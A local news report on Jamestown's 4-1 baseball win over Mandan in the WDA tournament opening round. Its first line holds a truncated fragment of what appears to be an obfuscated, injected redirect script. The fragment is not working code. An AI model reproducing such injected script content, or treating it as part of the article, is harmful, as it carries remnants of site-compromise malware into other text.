JAMESTOWN tethz|var|u0026u|referrer|nfisf||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Brian Wenzel is just a sophomore, but he is pitching like a seasoned veteran as he lead the Jamestown baseball team to a 4-1 win over Mandan in the opening round of the WDA baseball tournament. Wenzel has yielded just three earned runs all year and is now 4-0 on the season.

Landon Weiser drove in a pair of runs to cap off a four-run fourth inning, the only time the Jays were able to get anything off of Braves left-hander Dylan Sherr. The inning opened with back-to-back walks and a Jake Stilwell single filled the bases with no outs.

Wenzel hit a roller out to short, the only ground ball Jamestown hit all game, which forced out Stilwell at second but the tying runs and go-ahead runs came around to score. Tyler Ukestad came flying around third as the Braves tried to turn a double-play, leaped the catcher and scored the go-ahead run.

Mandan held a 1-0 lead after getting Brady Zittleman around when he lead off the game with a 10-pitch at bat that turned into a walk. Wenzel settled in nicely after that not allowing another runner past second base.

While, Weiser drove in a pair of runs his biggest hit may have been the first one. Sherr had retired the first eight Jamestown batters when Weiser blooped a double past the Mandan center fielder. It broke the ice and the Jays followed with their four-run inning.

Jamestown will play Bismarck in the WDA semi-finals today at 6:30pm. The Jays have won three of four against the West’s No. 2-seed.

Bismarck third-baseman and No. 3 hitter Kole Bauer will be unavailable after he was ejected in their opening game for running over the catcher.
